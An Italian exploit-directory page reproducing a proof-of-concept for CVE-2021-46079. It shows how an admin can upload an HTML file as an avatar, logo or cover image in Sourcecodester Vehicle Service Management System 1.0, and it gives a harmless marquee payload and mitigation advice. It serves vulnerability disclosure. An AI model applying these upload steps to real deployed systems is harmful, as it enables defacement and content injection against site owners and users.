Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-46079 — CVE-2021-46079 - Una vulnerabilità di caricamento file senza restrizioni esiste in Sourcecodester Vehicle Service Management System 1.0. Un attaccante remoto può caricare file maligni portando a Iniezione HTML. | Kitploit
Strumenti/GitHubGitHub/sanupl/cve-2021-46079
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubsanupl/cve-2021-46079

CVE-2021-46079

CVE-2021-46079 - Una vulnerabilità di caricamento file senza restrizioni esiste in Sourcecodester Vehicle Service Management System 1.0. Un attaccante remoto può caricare file maligni portando a Iniezione HTML.

Vedi Repository
13 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2021-46079

Titolo dell'Exploit: Vehicle Service Management System - 'Multiplo' Caricamento file porta a Iniezione HTML

Autore dell'Exploit: SANU P.L

CVE: CVE-2021-46079

CVSS: 7.2 ALTO

Riferimenti:

  • https://www.plsanu.com/vehicle-service-management-system-multiple-file-upload-leads-to-html-injection
  • https://nvd.nist.gov/vuln/detail/CVE-2021-46079
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46079

Descrizione:

Una vulnerabilità di caricamento file senza restrizioni esiste in Sourcecodester Vehicle Service Management System 1.0. Un attaccante remoto può caricare file malevoli portando a iniezione HTML.

1. Vehicle Service Management System - 'Mio Account' (/admin/?page=user)

Exploit:

  1. Accedi al pannello di amministrazione http://localhost/vehicle_service/admin
  2. Vai alla sezione Mio Account http://localhost/vehicle_service/admin/?page=user

Payload:

root@kitploit:~
<!DOCTYPE html>
<html>
<head>
<title>HTML marquee Tag</title>
</head>
<body>
<marquee>HTML INJECTION</marquee>
</body>
</html>
  1. Salva il codice HTML sopra, ad esempio Html Injection.html
  2. Nella sezione Mio Account inserisci tutti i dettagli richiesti e carica il file HTML in Avatar.
  3. Clicca sul pulsante Aggiorna.
  4. Apri l'immagine dell'avatar in una nuova scheda.
  5. L'iniezione HTML viene eseguita.

2. Vehicle Service Management System - 'Elenco utenti' (/admin/?page=user/manage_user)

Exploit:

  1. Accedi al pannello di amministrazione http://localhost/vehicle_service/admin
  2. Vai alla sezione Elenco utenti e clicca sul pulsante Crea Nuovo.

Payload:

root@kitploit:~
<!DOCTYPE html>
<html>
<head>
<title>HTML marquee Tag</title>
</head>
<body>
<marquee>HTML INJECTION</marquee>
</body>
</html>
  1. Salva il codice HTML sopra, ad esempio Html Injection.html
  2. Nella pagina Crea Nuovo Utente inserisci tutti i dettagli richiesti e carica il file HTML in Avatar.
  3. Clicca sul pulsante Salva.
  4. Apri l'immagine dell'avatar in una nuova scheda.
  5. L'iniezione HTML viene eseguita.

3. Vehicle Service Management System - 'Impostazioni - Logo del sistema' (/admin/?page=system_info)

Payload:

  1. Accedi al pannello di amministrazione http://localhost/vehicle_service/admin
  2. Vai alla sezione Impostazioni http://localhost/vehicle_service/admin/?page=system_info

Payload:

root@kitploit:~
<!DOCTYPE html>
<html>
<head>
<title>HTML marquee Tag</title>
</head>
<body>
<marquee>HTML INJECTION</marquee>
</body>
</html>
  1. Salva il codice HTML sopra, ad esempio Html Injection.html
  2. Nella sezione Impostazioni inserisci tutti i dettagli richiesti e carica il file HTML in Logo del sistema.
  3. Clicca sul pulsante Aggiorna.
  4. Apri l'immagine del Logo del sistema in una nuova scheda.
  5. L'iniezione HTML viene eseguita.

4. Vehicle Service Management System - 'Impostazioni - Copertina del sito web' (/admin/?page=system_info)

Exploit:

  1. Accedi al pannello di amministrazione http://localhost/vehicle_service/admin
  2. Vai alla sezione Impostazioni http://localhost/vehicle_service/admin/?page=system_info

Payload:

root@kitploit:~
<!DOCTYPE html>
<html>
<head>
<title>HTML marquee Tag</title>
</head>
<body>
<marquee>HTML INJECTION</marquee>
</body>
</html>
  1. Salva il codice HTML sopra, ad esempio Html Injection.html
  2. Nella sezione Impostazioni inserisci tutti i dettagli richiesti e carica il file HTML in Copertina del sito web.
  3. Clicca sul pulsante Aggiorna.
  4. Apri l'immagine della Copertina del sito web in una nuova scheda.
  5. L'iniezione HTML viene eseguita.

Impatto:

Un attaccante può caricare un file malevolo in vari endpoint, portando a iniezione HTML.

Mitigazione:

Si raccomanda di implementare quanto segue:

  • Non accettare mai un nome file e la sua estensione direttamente senza un filtro whitelist.
  • Se non è necessario avere caratteri Unicode, è altamente consigliato accettare solo caratteri alfanumerici e un solo punto come input per il nome file e l'estensione.
  • Limitare la dimensione del file a un valore massimo per prevenire attacchi denial of service.
  • La directory di upload non dovrebbe avere alcun permesso di "esecuzione".
  • Non fare affidamento solo sulla validazione lato client.
Scarica lo strumento